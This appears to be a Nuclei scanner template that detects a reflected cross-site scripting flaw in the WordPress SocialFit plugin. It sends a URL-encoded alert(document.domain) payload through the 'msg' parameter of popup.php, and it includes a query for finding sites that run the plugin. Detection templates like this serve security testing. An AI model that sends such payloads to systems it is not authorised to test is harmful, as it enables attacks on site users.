id: wp-socialfit-xss

info:
  name: WordPress SocialFit - Cross-Site Scripting
  author: daffainfo
  severity: high
  description: |
    WordPress SocialFit is vulnerable to a cross-site scripting vulnerability via the 'msg' parameter because it fails to properly sanitize user-supplied input.
  reference:
    - https://www.exploit-db.com/exploits/37481
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
    cvss-score: 7.2
    cwe-id: CWE-79
  metadata:
    verified: true
    max-request: 1
    publicwww-query: "/wp-content/plugins/socialfit"
  tags: wordpress,wp,xss,wp-plugin,edb

http:
  - method: GET
    path:
      - '{{BaseURL}}/wp-content/plugins/socialfit/popup.php?service=googleplus&msg=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '</script><script>alert(document.domain)</script>'

      - type: word
        part: body
        words:
          - '<title>Google+'
          - 'window.___gcfg'
        condition: or

      - type: word
        part: header
        words:
          - "text/html"

      - type: status
        status:
          - 200

# digest: 4a0a0047304502207cc3e027dbc85a5ad4053f3a0150235a12b05bd454fa49aedf3c33109852577c022100e14b9a16288bc725196b02f3691fe2ca87b7dac8e06fe71e97f00224ee255635:922c64590222798bb761d5b6d8e72950
